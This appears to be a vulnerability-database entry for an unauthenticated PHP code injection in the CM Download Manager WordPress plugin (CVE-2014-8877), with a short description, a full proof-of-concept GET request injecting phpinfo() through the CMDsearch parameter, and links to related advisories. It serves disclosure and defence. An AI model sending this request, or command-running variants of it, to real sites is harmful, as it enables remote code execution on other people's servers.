Lucene search
Ethicalhack3rWPEX-ID:7F4182AB-93BF-4766-B27C-9BD6217D2A20HistoryNov 20, 2014 - 12:00 a.m.
CM Download Manager <= 2.0.0 - Unauthenticated Code Injection
2014-11-2000:00:00
ethicalhack3r
13
The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-aliveRelated
patchstack
patchstack
WordPress CM Download Manager Plugin 2.0.0 - Code Injection
2014-11-22 00:00:00
exploitpack
exploitpack
WordPress Plugin CM Download Manager 2.0.0 - Code Injection
2014-11-22 00:00:00
openvas
openvas
WordPress CM Download Manager Plugin Remote PHP Code Execution Vulnerability
2014-11-21 00:00:00
securityvulns
securityvulns
wpvulndb
wpvulndb
CM Download Manager <= 2.0.0 - Unauthenticated Code Injection
2014-11-20 00:00:00
zdt
zdt
WordPress CM Download Manager 2.0.0 Code Injection Vulnerability
2014-11-20 00:00:00
checkpoint_advisories
checkpoint_advisories
WordPress CM Download Manager Code Injection (CVE-2014-8877)
2017-01-30 00:00:00
cve
cve
CVE-2014-8877
2014-12-05 18:59:00
packetstorm
packetstorm
WordPress CM Download Manager 2.0.0 Code Injection
2014-11-20 00:00:00
prion
prion
Code injection
2014-12-05 18:59:00
exploitdb
exploitdb
WordPress Plugin CM Download Manager 2.0.0 - Code Injection
2014-11-22 00:00:00
nmap
nmap
http-vuln-cve2014-8877 NSE Script
2015-11-11 17:02:28
Related for WPEX-ID:7F4182AB-93BF-4766-B27C-9BD6217D2A20